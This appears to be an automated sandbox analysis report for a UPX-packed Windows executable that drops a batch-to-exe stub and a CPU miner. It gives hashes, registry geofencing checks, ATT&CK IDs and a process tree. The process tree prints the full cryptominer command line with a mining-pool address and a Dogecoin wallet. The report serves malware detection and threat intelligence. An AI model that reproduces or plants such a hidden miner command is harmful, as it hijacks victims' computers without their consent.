73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
295s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
17-02-2024 16:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
2844	b2e.exe
468	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
468	cpuminer-sse2.exe
468	cpuminer-sse2.exe
468	cpuminer-sse2.exe
468	cpuminer-sse2.exe
468	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4336-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4336 wrote to memory of 2844	4336	batexe.exe	85
PID 4336 wrote to memory of 2844	4336	batexe.exe	85
PID 4336 wrote to memory of 2844	4336	batexe.exe	85
PID 2844 wrote to memory of 2316	2844	b2e.exe	87
PID 2844 wrote to memory of 2316	2844	b2e.exe	87
PID 2844 wrote to memory of 2316	2844	b2e.exe	87
PID 2316 wrote to memory of 468	2316	cmd.exe	89
PID 2316 wrote to memory of 468	2316	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4336
- C:\Users\Admin\AppData\Local\Temp\7426.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\7426.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\7426.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2844
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\76C6.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2316
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:468

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7426.tmp\b2e.exe

Filesize
5.1MB

MD5
c2823c3479d5109e6dd0e117c1fb74c7

SHA1
c0c09338f3a5b4f8c426e57acca9b73395234f1a

SHA256
2810bcde8055c1f6c79e376b0de16fd30bdc95cf1258edce18bf8571ec18ee8f

SHA512
fb7b0746485b54bcd4d869dea727217063bcfc1e5f33c53c267db57259dae01fabea60f543d7d497f0b6612194e91c08203e30987ed7d2216f30179ae74bb38f

Download Submit
C:\Users\Admin\AppData\Local\Temp\7426.tmp\b2e.exe

Filesize
2.7MB

MD5
393da80d518663bc9045228f1cd34e61

SHA1
98c2d6222f373e0961ff9aac95b1ab122cd584f6

SHA256
a8c513591c68e513364db94f79225c2b21368fe61d6371b73de7d3b3bc3bd43a

SHA512
b4142ce0723ff4b5f3e866440f9f05c0e366a95bb2a4989fcde79158a84e70026d35ad1cf43af35c69b36de53660b3772bd364e73ee8e622b5278e2aca89e210

Download Submit
C:\Users\Admin\AppData\Local\Temp\7426.tmp\b2e.exe

Filesize
1.9MB

MD5
db5c09852a9dce74cc260d402b8487bb

SHA1
7f53cb14088c23cb2140e52b245535100dfbea85

SHA256
e7a5f75e6901b233b87b806134d5bea194e44705f263f86f471c89fd16d9e262

SHA512
83f204c1b641a7c4e33b91cad2fe52c450637ff5653a8d98709d728f7930e9a9e13ceb974c2cf8e622f5ded0766ec86ca01684e3af80f6fd00100c27f36df133

Download Submit
C:\Users\Admin\AppData\Local\Temp\76C6.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.2MB

MD5
a2d7a74fed0e948391657e87c8d981ae

SHA1
1ba69dd249ab3e9c5f0f0fa71ee823a6701a31ed

SHA256
5268ff1b8ef083c923fb30c28575eb63b786d76e9f23dab7ffec9ab5e18b8aa1

SHA512
5504c52df21c9a9a0acc8d73091e2e1b7a0df407675da9e8fb811eed9c68684f518ddcfd185746b143692a68f9252bf37527676c8d6af306d25a704abc36e249

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
640KB

MD5
0f6af9e19fa927d88313e98d54420920

SHA1
0aff9c72864126107d6c630aafb9ed6512042afd

SHA256
71661d7077b93e2a5e53d7093e532bec1b66d34e3929bcb314eab7f431b84734

SHA512
bba078e2f4eb5ca45956657356f7419767a81679f34d9991bf28a1d44e412340d1002517f74a15583ffe20b32f1f25b60c47f4581100552dc1e651b3f88547be

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
954KB

MD5
8ecced7e6ce7e77928ca25187be0195d

SHA1
d9be5644a16a6296199f6a40a3a8910271443c6f

SHA256
2200e6bfc9d7839e85ef35ad6fdf92f9c0ad9e532541d8c6cebf20e6dfe3d6ad

SHA512
62e60816abd673f04ec24d702897f74dd8b7455a05481b2b3083b4ab3ce9d91ca32e54606a1ab08ff09079e6dae39c7343f33a14d58a4dd8ea44af190d197740

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.1MB

MD5
60b25308ef0249bbd3dc61c08bb2c3ef

SHA1
7d11f7700e27e83c474f736d5d82ba463cc8f559

SHA256
b89f3993535add1423e70d1bba98c54c977c2bb4e95319c834716a19a908bec8

SHA512
25d44faabf9a911113221b116467bac85b2abbc65cc8555c62830829f8f5d142ff3e9aa10a73f68c476fb94aa5d76d057cd722071aa5f182523a8a9ca27e5bb9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
752KB

MD5
87f1a1de8976ef7c70ec7fdf996fe28c

SHA1
1b85e8e7781bef088801c4afddd0dad5b0942518

SHA256
403bcb042cc93aa5e9e20774b009b48a15ace76d11525b1f604e0f168eb086be

SHA512
add24d120e215596402476e02ddcd2d58c2a1e4eb6a570449cc88feffb71fdb1d6ad144f56afad88ed50a676fbb7704a98efe94525d3341a012e96f45b831d2b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
408KB

MD5
1e4b9d3423fa29357762e7c380c0eb49

SHA1
8cabaa51bf485a8752fc8ba62624dbe2b5717edb

SHA256
6b78c5f8e114c27d9a73ae3e0909407014347fcc3fda7e7332c59635df22b67c

SHA512
e5c106c82aff84edf785d5e4dc537979ee963af38e1886bdf4b893cc4e3cde1207f4eeb7bb487dd22ddb7832cea612c1ddfe3ac1ade99683b354f4d3c9af6adb

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
730KB

MD5
a59d335a9abbdd32787c1c588c547826

SHA1
5d522c2ac4018af0d586a56a36da67cc97b0bff8

SHA256
5c3cdfa6173e3eef712fc04703c850a88450cee4b0a59f8c9a1cd3ba1a3cd055

SHA512
bc51540ecb9d4f174659a6f3e7288c3e0a274a18e0d14515a52d77ecaa4fac48f3e5d35a981177abb89af61f251660dfe15284f4112db1356e6a2e5908180337

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
546KB

MD5
01bea06392e6d362c41d8fa095164ed1

SHA1
fdaff5a3feffaabd0a6a88b95675137655740af5

SHA256
482b9f480aaf6e0016d603ba9b641f125dc8ddcdd8fcce5a214bfb3d1a9a5837

SHA512
22137d3657e22e308c38ec0d4bc02ba46c94337b65f7cc23c091de5fc977fc364d7972e063ce0c6d6d8da6d4d55521a6fe2e1f0983e53be354f038e088d7b905

Download Submit
memory/468-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/468-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/468-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/468-45-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/468-44-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/468-46-0x000000005BE40000-0x000000005BED8000-memory.dmp

Filesize
608KB

Download
memory/468-47-0x0000000001010000-0x00000000028C5000-memory.dmp

Filesize
24.7MB

Download
memory/468-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/468-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/468-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/468-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/468-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/468-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/468-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/468-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2844-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2844-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4336-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download